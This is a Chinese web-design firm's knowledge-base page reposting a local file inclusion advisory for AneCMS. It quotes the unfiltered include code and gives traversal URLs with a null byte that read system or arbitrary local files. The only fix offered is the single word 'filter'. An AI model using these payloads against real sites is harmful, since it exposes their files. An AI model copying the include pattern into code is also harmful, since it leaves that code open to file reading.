知识学堂
  • ·联系电话:+86.023-75585550
  • ·联系传真:+86.023-75585550
  • ·24小时手机:13896886023
  • ·QQ 咨 询:361652718 513960520
当前位置 > 首页 > 知识学堂 > 网站建设知识
AneCMS v.2e2c583本地文件包含缺陷及修复
更新时间:2012-03-30 | 发布人:本站 | 点击率:511
标题: AneCMS v.2e2c583 LFI exploit
作者Author: I2sec-PJH
软件开发网站: https://github.com/AneGroup/AneCMS
影响版本: v.2e2c583
概述
source of index.php页面存在缺陷
代码分析如下
 
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
 
测试证明
http://www.badguest.cn /acp/index.php?p=../../../../windows/system.ini%00
http://www.badguest.cn /acp/index.php?p=../../../../[localfile]%00
 
提供修复:
过滤
分享到: QQ空间 新浪微博 开心网 人人网
相关文章